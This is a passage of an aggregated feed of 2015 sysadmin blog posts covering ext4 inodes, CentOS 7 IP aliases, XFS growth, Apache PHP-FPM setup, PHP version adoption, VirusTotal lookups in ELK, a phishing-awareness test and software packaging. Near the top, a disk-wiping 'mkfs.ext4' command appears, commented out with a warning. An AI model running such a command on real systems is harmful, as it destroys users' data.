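DISK_BYTES=$((10 * 1024 * 1024 * 1024))   # a 10GB partition
echo $((DISK_BYTES / BYTES_PER_INODE))    # prints 655360

# To roughly double the inode count when (re)formatting, halve the ratio.
# WARNING: destructive, wipes the filesystem -- shown as a comment only.
# mkfs.ext4 -i 8192 /dev/sdX
```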

As usual, the Archwiki has a good explanation on why we don't just make the default inode number 10x higher.

For partitions with size in the hundreds or thousands of GB and average file size in the megabyte range, this usually results in a much too large inode number because the number of files created never reaches the number of inodes.

This results in a waste of disk space, because all those unused inodes each take up 256 bytes on the filesystem (this is also set in /etc/mke2fs.conf but should not be changed). 256 * several millions = quite a few gigabytes wasted in unused inodes.
Archwiki: ext4

You may be able to create a new partition if you have spare disks/space in your LVM and choose a filesystem that's better suited to handling many small files, like ReiserFS.


by Mattias Geniar at August 02, 2015 07:52 PM

How To Add Secondary IP / Alias On Network Interface in RHEL / CentOS 7

The post How To Add Secondary IP / Alias On Network Interface in RHEL / CentOS 7 appeared first on

This guide will show you how to add an extra IP address to an existing interface in Red Hat Enterprise Linux / CentOS 7. There are a few different methods than on CentOS 6, so there may be some confusion if you're trying this on a CentOS 7 system for the first time.

First, determine if your network interfaces are under the control of the Network Manager. If that's the case, you'll want to keep using the Network Manager to manage your interfaces and aliases. If it's not under Network Manager control, you can happily modify your configs by hand.

View your IP Addresses

The "old" days of Linux used to be all about ifconfig. It would show you all interfaces and their IP aliases on the server. In CentOS/RHEL 7, that's not the case. To see all IP addresses, use the ip tool.

$ ip a | grep 'inet '
    inet scope host lo
    inet brd scope global dynamic eth0
    inet brd scope global dynamic eth1

This syntax is more in line with most routers/switches, where you can grep for inet and inet6 for your IPv4 and IPv6 IP addresses.

$ ip a | grep 'inet6 '
    inet6 ::1/128 scope host
    inet6 fe80::a00:27ff:fe19:cd16/64 scope link
    inet6 fe80::a00:27ff:fefd:6f54/64 scope link

So remember: use ip over ifconfig.

Using Network Manager

Check if your interface you want to add an alias to, uses the Network Manager.

$ grep 'NM_CONTROLLED' /etc/sysconfig/network-scripts/ifcfg-ens160

If that's a yes, you can proceed with the next configurations using the Network Manager tool.

You may be used to adding a new network-scripts file in /etc/sysconfig/network-scripts/, but you'll find that doesn't work in RHEL / CentOS 7 as you'd expect if the Network Manager is being used. Here's what a config would look like in CentOS 6:

$ cat ifcfg-ens160:0

After a network reload, the primary IP address will be removed from the server and only the IP address from the alias interface will be present. That's not good. That's the Network Manager misinterpreting your configuration files, overwriting the values from your main interface with the one from your alias.

The simplest/cleanest way to add a new IP address to an existing interface in CentOS 7 is to use the nmtui tool (Text User Interface for controlling NetworkManager).

$ nmtui


Once nmtui is open, go to the Edit a network connection and select the interface you want to add an alias on.


Click Edit and tab your way through to Add to add extra IP addresses.


Save the configs and the extra IP will be added.

If you check the text-configs that have been created in /etc/sysconfig/network-scripts/, you can see how nmtui has added the alias.

$ cat /etc/sysconfig/network-scripts/ifcfg-ens192
# Alias on the interface

If you want, you can modify the text file, but I find using nmtui to be much easier.

Manually Configuring An Interface Alias

Only use this if your interface is not controlled by Network Manager.

$ grep 'NM_CONTROLLED' /etc/sysconfig/network-scripts/ifcfg-ens160

If Network Manager isn't used, you can use the old style aliases you're used to from CentOS 5/6.

$ cat ifcfg-ens160:0
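A minimal sketch of such an old-style alias file (all values below are illustrative examples; 192.0.2.x is a documentation address range):

```
# /etc/sysconfig/network-scripts/ifcfg-ens160:0 -- example values only
DEVICE=ens160:0
BOOTPROTO=static
IPADDR=192.0.2.20
NETMASK=255.255.255.0
ONBOOT=yes
```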

Bring up your alias interface and you're good to go.

$ ifup ens160:0

Don't use this if Network Manager is in control.

Adding a temporary IP address

Want to add an IP address just for a little while? You can add one using the ip command. It only lasts until you reboot your server or restart the network service, after that -- the IP is gone from the interface.

$ ip a add 192.0.2.10/24 dev eth0    # example address

Perfect for temporary IPs!


by Mattias Geniar at August 02, 2015 07:29 PM

Increase/Expand an XFS Filesystem in RHEL 7 / CentOS 7

The post Increase/Expand an XFS Filesystem in RHEL 7 / CentOS 7 appeared first on

This guide will explain how to grow an XFS filesystem once you've increased the underlying storage.

If you're on a VMware machine, have a look at this guide to increase the block device, partition and LVM volume first: Increase A VMware Disk Size (VMDK) Formatted As Linux LVM without rebooting. Once you reach the resize2fs command, return here, as that only applies to EXT2/3/4.

To see the info of your block device, use xfs_info.

$ xfs_info /dev/mapper/centos-root
meta-data=/dev/mapper/centos-root isize=256    agcount=4, agsize=1210880 blks
         =                       sectsz=512   attr=2, projid32bit=1
         =                       crc=0
data     =                       bsize=4096   blocks=4843520, imaxpct=25
         =                       sunit=0      swidth=0 blks
naming   =version 2              bsize=4096   ascii-ci=0 ftype=0
log      =internal               bsize=4096   blocks=2560, version=2
         =                       sectsz=512   sunit=0 blks, lazy-count=1
realtime =none                   extsz=4096   blocks=0, rtextents=0

Once the volume group/logical volume has been extended (see this guide for increasing lvm), you can expand the partition using xfs_growfs.

$  xfs_growfs /dev/mapper/centos-root
meta-data=/dev/mapper/centos-root isize=256    agcount=4, agsize=1210880 blks
         =                       sectsz=512   attr=2, projid32bit=1
         =                       crc=0
data     =                       bsize=4096   blocks=4843520, imaxpct=25
         =                       sunit=0      swidth=0 blks
naming   =version 2              bsize=4096   ascii-ci=0 ftype=0
log      =internal               bsize=4096   blocks=2560, version=2
         =                       sectsz=512   sunit=0 blks, lazy-count=1
realtime =none                   extsz=4096   blocks=0, rtextents=0

The increase will happen in near-realtime and probably won't take more than a few seconds.

Using just xfs_growfs, the filesystem will be grown to its maximum available size. If you want to grow it by only a certain number of blocks, use the -D option.
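For example, to work out a value for -D (the new size is given in filesystem blocks, using the bsize reported by xfs_info, 4096 bytes here; the 25GB target and the device name are assumptions for illustration):

```shell
# Grow the filesystem to 25GB worth of 4 KiB blocks.
TARGET_BYTES=$((25 * 1024 * 1024 * 1024))
BLOCK_SIZE=4096                           # bsize from xfs_info
echo $((TARGET_BYTES / BLOCK_SIZE))       # prints 6553600
# On the real system you would then run:
# xfs_growfs -D 6553600 /dev/mapper/centos-root
```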

If you don't see any increase in disksize using df, check this guide: Df command in Linux not updating actual diskspace, wrong data.


by Mattias Geniar at August 02, 2015 07:09 PM

Apache 2.4: ProxyPass (For PHP) Taking Precedence Over Files/FilesMatch In Htaccess

The post Apache 2.4: ProxyPass (For PHP) Taking Precedence Over Files/FilesMatch In Htaccess appeared first on

I got to scratch my head on this one for a while. If you're writing a PHP-FPM config for Apache 2.4, don't use the ProxyPassMatch directive to pass PHP requests to your FPM daemon.

This will cause you headaches:

# don't
<IfModule mod_proxy.c>
  ProxyPassMatch ^/(.*\.php(/.*)?)$ fcgi://
</IfModule>

You will much rather want to use a FilesMatch block and refer those requests to a SetHandler that passes everything to PHP.

# do this instead
# Use SetHandler on Apache 2.4 to pass requests to PHP-FPM
<FilesMatch \.php$>
  SetHandler "proxy:fcgi://"
</FilesMatch>

Why is this? Because the ProxyPassMatch directives are evaluated first, before the FilesMatch configuration is being run.

That means if you use ProxyPassMatch, you can't deny/allow access to PHP files and can't manipulate your PHP requests in any way anymore.

So for passing PHP requests to an FPM daemon, you'd want to use FilesMatch + SetHandler, not ProxyPassMatch.
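That difference matters in practice: with the FilesMatch approach, the usual access-control directives still apply to PHP files. A sketch (status.php is a hypothetical file you might want to shield):

```
# Works with the FilesMatch/SetHandler setup, but is silently
# bypassed when ProxyPassMatch grabs the request first:
<FilesMatch ^status\.php$>
  Require ip 127.0.0.1
</FilesMatch>
```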


by Mattias Geniar at August 02, 2015 08:05 AM

August 01, 2015

Philip Van Hoof

Making use of relationships between metadata

I recently claimed somewhere that a system which collects relationships (where, when, with whom, why) about content, rather than mere metadata (title, date, author, etc.), could offer a solution to a problem that users of digital media will increasingly face: having collected so much material that they can no longer find anything in it quickly enough.

I think relationships should carry more weight than mere metadata because it is through relationships that we humans store information in our brains. Not through facts (title, date, author, etc.) but through relationships (where, when, with whom, why).

As a hypothetical example, I said I wanted to find a video I had watched with Erika while on holiday with her, and which she had marked as really great.

What are the relationships we need to collect? This is a simple analysis exercise: just underline the nouns and rewrite the problem:

So let me pour this use case into RDF and solve it with SPARQL. This is what we need to collect. I'll write it in pseudo-TTL. Imagine for a moment that this ontology actually exists:

<erika> a Person ; name "Erika" .
<vakantiePlek> a PointOfInterest ; title "De vakantieplek" .
<filmA> a Movie ; lastSeenAt <vakantiePlek> ; sharedWith <erika>; title "The movie" .
<erika> likes <filmA> .

This is then the SPARQL query:

SELECT ?m { ?v a Movie ; title ?m . ?v lastSeenAt ?p . ?p title ?pt . ?v sharedWith <erika> . <erika> likes ?v . FILTER (?pt LIKE '%vakantieplek%') }

I leave it as an exercise for the reader to convert this to the Nepomuk ontology (which, I believe, can handle this entire use case). You can then test it on your N9 or on a standard GNOME desktop with the tracker-sparql tool. I bet it works. :-)

The big problem is indeed acquiring the relationship data. Writing the query is fairly easy. Settling on the ontology and agreeing on it with all parties, somewhat less so. Gathering the information is the real difficulty.

Oh, and once collected: keeping the information safe without violating my privacy. Nowadays that seems downright impossible. Unfortunately.

In any case, there is no need for a supercomputer or the like to solve this centrally (with AI and all of today's horribly complex hype).

Every small device can solve this kind of use case on its own. The inserts and query above are easy to process. SQLite handles this in a few milliseconds with a denormalised schema. Your fancy hipster NoSQL solution probably does too.

That is because the weight of data acquisition lies on the relationships rather than on the facts.

by admin at August 01, 2015 02:48 PM

July 31, 2015

Frank Goossens

I Am A Cyclist, And I Am Here To Fuck You Up


It is morning. You are slow-rolling off the exit ramp, nearing the end of the long-ass commute from your suburban enclave. You have seen the rise of the city grow larger and larger in your windshield as you crawled through sixteen miles of bumper-to-bumper traffic. You foolishly believed that, now that you are in the city, your hellish morning drive is coming to an end.

Just then! I emerge from nowhere to whirr past you at twenty-two fucking miles per hour, passing twelve carlengths to the stoplight that has kept you prisoner for three cycles of green-yellow-red. The second the light says go, I am GOING, flying, leaving your sensible, American, normal vehicle in my dust.

by frank at July 31, 2015 07:34 AM

July 30, 2015

Joram Barrez

The Activiti Performance Showdown Running on Amazon Aurora

Earlier this week, Amazon announced that Amazon Aurora is generally available on Amazon RDS. The Aurora website promises a lot: Amazon Aurora is a MySQL-compatible, relational database engine that combines the speed and availability of high-end commercial databases with the simplicity and cost-effectiveness of open source databases. Amazon Aurora provides up to five times better […]

by Joram Barrez at July 30, 2015 03:09 PM

Frank Goossens

Folding-bike dilemmas 2015

After 5 years of folding-bike riding, an estimated 23,000 km and 3 new handlebar hinges (!), I have finally replaced my Dahon Vitesse D7HG. I did wonder whether to go for a Brompton after all, but even the base model costs almost twice as much, and taking into account the options I'd have to pay extra for, my cycling mileage, the terrain (Brussels is demanding on bike and rider alike) and my... wear-and-tear riding style, I really couldn't see that extra investment paying off.

Old (2010) and new (2015) together one last time

So a new Dahon Vitesse D7HG it is (and yes, again with that Shimano Nexus 7-speed internal hub; who on earth would still want to ride around with a derailleur?). But that wasn't the end of the dilemmas: buy it online, more than 20% cheaper (!), or choose the bike shop around the corner? It became the bike shop; for repairs under warranty (handlebar hinges, for example) you have to ship the bike back to the online store and you lose it for weeks. And for ordinary repairs they have, despite being busy, always helped me quickly, well and cheaply these past 5 years (and before that, with my other bikes). No, that 20% investment in the best after-sales service (and in the local economy) will pay for itself.

by frank at July 30, 2015 07:21 AM

July 29, 2015

Mattias Geniar

Why We’re Still Seeing PHP 5.3 In The Wild (Or: PHP Versions, A History)

The post Why We’re Still Seeing PHP 5.3 In The Wild (Or: PHP Versions, A History) appeared first on

WordPress offers an API that can list the PHP versions used in the wild. It shows some interesting numbers that warrant some extra thoughts.

Here are the current statistics on PHP versions used in WordPress installations. The output below uses jq for JSON formatting at the CLI.

$ curl | jq '.'
{
  "5.2": 13.603,
  "5.3": 32.849,
  "5.4": 40.1,
  "5.5": 9.909,
  "5.6": 3.538
}

Two versions stand out: PHP 5.3 is used in 32.8% of all installations, PHP 5.4 on 40.1%.

Both of these versions are end of life. PHP 5.4 still receives security updates [2], but only until mid-September of this year, and it no longer gets bug fixes. That's 1.5 months left on the counter.

But if they're both considered end of life, why do they still account for 72.9% of all WordPress installations?
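That 72.9% is simply the sum of the 5.3 and 5.4 shares from the API response above:

```shell
# Sum the PHP 5.3 and 5.4 shares from the WordPress stats shown above
awk 'BEGIN { printf "5.3 + 5.4 = %.1f%%\n", 32.849 + 40.1 }'
```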

Prologue: Shared Hosting

These stats are gathered anonymously by WordPress. Since most WordPress installations are on shared hosting, it's safe to assume they are set up once and never looked at again. It's a good thing WordPress can auto-update, or the web would be doomed.

There are of course WordPress installations on custom servers, managed systems, etc., but those account for only a small percentage of all WordPress installations. It's important to keep in mind that the rest of these numbers will mostly apply to shared hosting only.

PHP Version Support

Here's a quick history of relevant PHP versions, meaning 5.0 and upwards. I'll ignore the small percentage of sites still running on PHP 4.x.

Version Released End Total duration
5.0 July 13th, 2004 September 5th, 2005 419 days
5.1 November 24th, 2005 August 24th, 2006 273 days
5.2 November 2nd, 2006 January 6th, 2011 1526 days
5.3 June 30th, 2009 August 14th, 2014 1871 days
5.4 March 1st, 2012 September 14th, 2015 1292 days
5.5 June 20th, 2013 July 10th, 2016 1116 days
5.6 August 28th, 2014 August 28th, 2017 1096 days
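The "Total duration" column is simply the number of days between release and end of life; for PHP 5.3, for example (GNU date assumed):

```shell
# Days PHP 5.3 was supported: 2009-06-30 (release) to 2014-08-14 (end of life)
start=$(date -u -d "2009-06-30" +%s)
end=$(date -u -d "2014-08-14" +%s)
echo $(( (end - start) / 86400 ))
```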

It's no wonder we're still seeing PHP 5.3 in the wild: the version has been supported for more than 5 years. That means a lot of users will have installed WordPress on a PHP 5.3 host and simply never bothered updating, because of the install-once, update-never mentality.

As long as their WordPress continues to work, why would they -- right? [1]

If my research was correct, in 2005 there were 2 months where there wasn't a supported version of PHP 5. At that time, support for 5.0 was dropped and 5.1 wasn't released until a couple of months later.

Versions vs. Server Setups

PHP has been around for a really long time and it's seen its fair share of server setups. It's been run as mod_php in Apache, CGI, FastCGI, embedded, CLI, litespeed, FPM and many more. We're now evolving to multiple PHP-FPM masters per server, each for its own site.

With the rise of HHVM, we'll see even more different types of PHP deployments.

From what I can remember of my earlier days in hosting, this was the typical PHP setup on shared hosting.

Version Server setup
5.0 Apache + mod_php
5.1 Apache + mod_php
5.2 Apache + suexec + CGI
5.3 Apache + suexec + FastCGI
5.4 Apache + FPM
5.5 Apache + FPM
5.6 Apache + FPM

The server-side has seen a lot of movement. The current method of running PHP as FPM daemons is far superior to running it as mod_php or CGI/FastCGI. But it took the hosting world quite some time to adopt this.

Even with FPM support coming to PHP 5.3, most servers were still running as CGI/FastCGI.

That was/is a terrible way to run PHP.

It's probably what made it take so long to adopt PHP 5.4 on shared hosting servers. It required a complete rewrite of everything that is shared hosting: no more CGI/FastCGI, but proxy setups passing requests to PHP-FPM. Since FPM support only came to PHP 5.3 a couple of minor versions in, most hosting providers first experienced FPM on 5.4. Once their FPM config was ready, adopting PHP 5.5 and 5.6 was trivial.
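Such a proxy setup can be sketched in one Apache 2.4 fragment (the socket path and pool name are assumptions):

```apache
# Hand every PHP request to a per-site PHP-FPM pool over a unix socket,
# replacing the old CGI/FastCGI wrapper scripts entirely
<FilesMatch "\.php$">
    SetHandler "proxy:unix:/run/php-fpm/site1.sock|fcgi://localhost"
</FilesMatch>
```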

Only PHP 5.5's changed opcache made for some configuration changes, but didn't have any further server-side impact.

PHP 5.3 has been supported for a really long time. PHP 5.4 took ages to be implemented on most shared server setups, prolonging the life of PHP 5.3 long past its expiration date.

If you're installing PHP on a new Red Hat Enterprise Linux/CentOS 7, you get version 5.4. RHEL still backports security fixes[2] from newer releases to 5.4 if needed, but it's essentially an end of life version. It may get security fixes[2], but it won't get bug fixes.

This explains the increase in PHP 5.4 usage worldwide: it's the default version on the latest RHEL/CentOS.

Moving PHP forward

In order to let these ancient versions of PHP finally rest in peace, a few things need to change drastically, the same things that have kept PHP 5.3 alive for so long:

  1. WordPress needs to bump its minimal PHP version from 5.2 to at least PHP 5.5 or 5.6
  2. Drupal 7 also runs on PHP 5.2, with Drupal 8 bumping the minimum version to 5.5.
  3. Shared Hosting providers need to drop PHP 5.2, 5.3 and 5.4 support and move users to 5.5 or 5.6.
  4. OS vendors and packagers need to make at least PHP 5.5 or 5.6 the default, instead of 5.4 that's nearly end of life.
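For point 1, the version gate itself is trivial; a minimal sketch of the kind of minimum-version check an installer could run (GNU `sort -V` assumed; the function name is made up):

```shell
# Returns success when CURRENT satisfies the REQUIRED minimum version
min_version_ok() {  # usage: min_version_ok REQUIRED CURRENT
  [ "$(printf '%s\n' "$1" "$2" | sort -V | head -n1)" = "$1" ]
}

min_version_ok 5.5 5.6.12 && echo "5.6.12 is recent enough"
min_version_ok 5.5 5.3.29 || echo "5.3.29 is too old"
```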

We are doing what we can to improve point 3), by encouraging shared hosting users to upgrade to later releases. Fingers crossed WordPress and OS vendors do the same.

It's unfair to blame the PHP project for the fact that we're still seeing 5.3 and 5.4 in the wild today. But because both versions have been supported for such a long time, their install base is naturally large.

Later releases of PHP have seen shorter support cycles, which will make users think more about upgrading and schedule accordingly. Having a consistent release and deprecation schedule is vital for faster adoption rates.

[1] Well, if you ignore security, speed and scalability as added benefits.
[2] I've proclaimed PHP's CVE vulnerabilities as being irrelevant, and I still stand by that.

The post Why We’re Still Seeing PHP 5.3 In The Wild (Or: PHP Versions, A History) appeared first on

by Mattias Geniar at July 29, 2015 07:32 PM

Frank Goossens

The 2 Bears Getting Together on Our Tube

The 2 Bears is a duo comprised of Hot Chip’s Joe Goddard and Raf Rundell. “Get Together” is one of the songs on their 2012 debut album “Be Strong”.

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at July 29, 2015 06:05 AM

July 28, 2015

Xavier Mertens

Integrating VirusTotal within ELK

[The post Integrating VirusTotal within ELK has been first published on /dev/random]

VirusTotal Scan

[This blogpost has also been published as a guest diary on]

Visualisation is key when you need to keep control of what's happening on networks which carry tons of malicious files daily. VirusTotal is a key player in fighting malware on a daily basis. Not only can you submit and search for samples on their website, they also provide an API to integrate into your software or scripts. A few days ago, Didier Stevens posted some SANS ISC diaries about the integration of VirusTotal into Microsoft Sysinternals tools (here, here and here). The most common API call is to query the database for a hash. If the file was already submitted by someone else and successfully scanned, you'll get back interesting results, the best known being the file score in the form “x/y”. The goal of my setup is to integrate VirusTotal within ELK. To feed VirusTotal, hashes of interesting files must be computed. I'm getting interesting hashes via my Suricata IDS, which inspects all the Internet traffic passing through my network.

The first step is to configure the MD5 hashes support in Suricata. The steps are described here. Suricata logs are processed by a Logstash forwarder and MD5 hashes are stored and indexed via the field ‘fileinfo.md5‘:

MD5 Hash

(Click to enlarge)

Note: It is mandatory to configure Suricata properly to extract files from network flows, otherwise the MD5 hashes won't be correct. It's like using a snaplen of ‘0’ with tcpdump. In Suricata, have a look at the inspected response body size for HTTP requests and the stream reassembly depth. These settings can also have an impact on performance; fine-tune them to match your network's behaviour.
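The settings mentioned above look roughly like this in a 2015-era suricata.yaml (a hedged sketch; exact key names vary between Suricata versions):

```yaml
# suricata.yaml (fragment): extract files over HTTP and log their MD5
outputs:
  - file-log:
      enabled: yes
      filename: files-json.log
      force-magic: yes     # always compute the file's magic type
      force-md5: yes       # always compute the MD5, even without a rule match

libhtp:
  default-config:
    response-body-limit: 0 # inspect the full HTTP response body

stream:
  reassembly:
    depth: 0               # no reassembly depth limit
```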

To integrate VirusTotal within ELK, a Logstash filter already exists, developed by Jason Kendall. The code is available online. To install it, follow this procedure:

# cd /data/src
# git clone
# cd logstash-filter-virustotal
# gem2.0 build logstash-filter-virustotal.gemspec
# cd /opt/logstash
# bin/plugin install /data/src/logstash-filter-virustotal/logstash-filter-virustotal-0.1.1.gem

Now, create a new filter which will call the plugin and restart Logstash.

filter {
    if ( [event_type] == "fileinfo" and
         [fileinfo][filename] =~ /(?i)\.(doc|pdf|zip|exe|dll|ps1|xls|ppt)/ ) {
        virustotal {
            apikey => '<put_your_vt_api_key_here>'
            field => '[fileinfo][md5]'
            lookup_type => 'hash'
            target => 'virustotal'
        }
    }
}

The filter above will query virustotal.com for the MD5 hash stored in ‘fileinfo.md5‘ if the event contains file information generated by Suricata and the filename has an interesting extension. Of course, you can adapt the filter to your own environment and match only specific file formats using ‘fileinfo.magic‘ or a minimum file size using ‘fileinfo.size‘. If the conditions match a file, a query will be performed using the API and the results stored in a new ‘virustotal‘ field:

VirusTotal Results

(Click to enlarge)

Now, it’s up to you to build your ElasticSearch queries and dashboard to detect suspicious activities in your network. During the implementation, I detected that too many requests sent in parallel to might freeze my Logstash (mine is 1.5.1). Also, keep an eye on your API key consumption to not break your request rate or daily/monthly quota.

[The post Integrating VirusTotal within ELK has been first published on /dev/random]

by Xavier at July 28, 2015 05:57 PM

The Rough Life of Defenders VS. Attackers

[The post The Rough Life of Defenders VS. Attackers has been first published on /dev/random]

Scale of Justice

Yesterday was the first time that I heard the expression “Social Engineering” in the Belgian public media! If this topic made the news, you can imagine that something weird (or juicy, from a journalist's perspective) happened. The Flemish administration had the good idea to test the resistance of their 15K officials against a phishing attack. As people remain the weakest link, that sounds like a good initiative, right? But if it was disclosed in the news, you can imagine that it was in fact … a flop! (The article is available here in French)

The scenario was classic but well written. People received an email from Thalys, an international train operator (used by many Belgian travellers), reporting a billing issue with their last trip: if they did not provide their bank details, their credit card would be charged up to 20K EUR. The people behind this scenario had not thought about the possible side effects of such a massive mailing. People flooded the Thalys customer support centre with angry calls; others simply notified the police. Thalys, being a commercial company, reacted to the lack of communication and the unauthorized use of their brand in the rogue email.

I have already performed this kind of social engineering attack for customers and I know that it's definitely not easy. Instead of breaking into computers, we are trying to break into humans' behaviour, and their reactions can be very different: fear, shame, anger, … I suppose the Flemish government was working with a partner or contractor to organize the attack. They should have followed a few basic rules:

But a few hours ago, while driving back home and thinking about this bad story, I realized that this proves once again the big differences between defenders and attackers! Attackers use copyrighted material all the time; they build fake websites or compromise official ones to inject malicious payloads into visitors' browsers. They send millions of emails targeting everybody. On the other side, defenders have to perform their job while defending their ass at the same time! And recent changes like the updated Wassenaar Arrangement won't help in the future. I'm curious about the results of this giant test: how many people really clicked, opened a file or handed over their bank details? That was not reported in the news…

[The post The Rough Life of Defenders VS. Attackers has been first published on /dev/random]

by Xavier at July 28, 2015 08:37 AM

Kris Buytaert

The power of packaging software, package all the things

Software delivery is hard; plenty of people all over this planet struggle with delivering software in their own controlled environment. They have invented great patterns that build an artifact, then do some magic, and the application is up and running.

When talking about continuous delivery, people invariably discuss their delivery pipeline and the different components that need to be in that pipeline.
Often, the focus on getting the application deployed or upgraded from that pipeline is so strong that teams
forget how to deploy their environment from scratch.

After running a number of tests on the code, compiling it where needed, people want to move forward quickly and deploy their release artifact on an actual platform.
This deployment is typically via a file upload or a checkout from a source-control tool from the dedicated computer on which the application resides.
Sometimes, dedicated tools are integrated to simulate what a developer would do manually on a computer to get the application running. Copy three files left, one right, and make sure you restart the service. Although this is obviously already a large improvement over people manually pasting commands from a 42 page run book, it doesn’t solve all problems.

Think of the guy who quickly makes a change on the production server but never commits it (say goodbye to git pull as your upgrade process).
If you package your software, there are a couple of things you get for free from your packaging system.
Questions like: has this file been modified since I deployed it? Where did this file come from, and when was it deployed? What version of software X do I have running on all my servers? All of these are easily answered by the same tools we already use for every other package on the system. Not only can you use existing tools, you are also using tools that are well known by your ops team, tools they already use for every other piece of software on your system.
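Those questions map directly onto standard package-manager queries; for example on an rpm-based system (the Debian equivalents would be dpkg -S and debsums; the file and package names here are just illustrations):

```shell
# Which package owns this file, and has anything changed since install?
if command -v rpm >/dev/null; then
  rpm -qf /etc/ssh/sshd_config           # owning package of a file
  rpm -V openssh-server || true          # files that differ from the package db
  rpm -q --last openssh-server || true   # when it was installed/upgraded
fi
```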

If your build process creates a package and uploads it to a package repository that is available to the hosts in the environment you want to deploy to, there is no need anymore for a script that copies the artifact from a 3rd-party location, and even less for that 42-page text document which never gets updated and still tells you to download yaja.3.1.9.war from a location where you can only find 3.2 and 3.1.8, while the developer who knows whether you can use 3.2, or why 3.1.9 got removed, just left for the long weekend.

Another, and maybe even more important, thing is the sadly growing practice of having yet another tool in place that translates that 42-page text document into a bunch of shell scripts created from a drag-and-drop interface; typically that "deploy tool" is even triggered from within the pipeline. Apart from the fact that it usually stimulates a pattern of non-reusable code, distributes even more ssh keys, or adds yet another agent on all systems, it doesn't take into account that you want to think of your servers as cattle and be able to deploy new instances of your application fast.
Do you really want to deploy your five new nodes on AWS with a full Apache stack ready for production, then reconfigure your load balancers, only to figure out that someone needs to go click in your continuous integration or deployment tool to deploy the application to the new hosts? That one manual action someone forgets?
Imvho, deployment tools are a phase in the maturity process of a product team: yes, it's a step up from manually deploying software, but it creates more and different problems, and once your team grows in maturity, refactoring out that tool is trivial.

The obvious and trivial approach to this problem, which comes with even more benefits, is packaging. When you package your artifacts as operating system packages (e.g., .deb or .rpm),
you can include that package in the list of packages to be deployed at installation time (via Kickstart or debootstrap). Similarly, when your configuration management tool
(e.g., Puppet or Chef) provisions the computer, you can specify which version of the application you want deployed by default.
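With Puppet, for instance, pinning the deployed version is a one-resource sketch (the package name and version are made up, echoing the yaja example above):

```puppet
# Ensure the application package is present at an exact, known version,
# so freshly provisioned cattle come up identical to the existing herd
package { 'yaja':
  ensure => '3.1.9-1',
}
```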

So, when you’re designing how you want to deploy your application, think about deploying new instances or deploying to existing setups (or rather, upgrading your application).
Doing so will make life so much easier when you want to deploy a new batch of servers.

by Kris Buytaert at July 28, 2015 06:35 AM

July 26, 2015

Mattias Geniar

This American Life: The DevOps Episode

The post This American Life: The DevOps Episode appeared first on

If you're a frequent podcast listener, chances are you've heard of the This American Life podcast. It's probably the most listened-to podcast available.

While it normally features all kinds of content, from humorous stories to gripping drama, last week's episode felt a bit different.

They ran a story about NUMMI, a car plant where Toyota and GM worked together to improve productivity.

Throughout the story, a lot of topics come up that can all be brought back to our DevOps ways.

There are a lot more details in the podcast, and you'd be amazed how many serve as analogies for our DevOps movement.

If you're using the Overcast podcast player (highly recommended), you can get the episode here: NUMMI 2015. Or you can grab it from the official website/itunes at

The post This American Life: The DevOps Episode appeared first on

by Mattias Geniar at July 26, 2015 08:49 AM

July 24, 2015

Frank Goossens

How technology (has not) improved our lives

The future is bright, you’ve got to wear shades? But why do those promises for a better future thanks to technology often fail to materialize? And how is that linked with the history of human flight, folding paper and the web? Have a look at “Web Design: first 100 years”, a presentation by Maciej Cegłowski (the guy behind An interesting read!

by frank at July 24, 2015 04:57 PM

Music from Our Tube: Algiers’ Black Eunuch

As heard on KCRW just now. The live version on KEXP is pretty intense, but somehow does not seem fully … fleshed out yet. Anyways, Algiers is raw, psychedelic & very promising;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at July 24, 2015 09:40 AM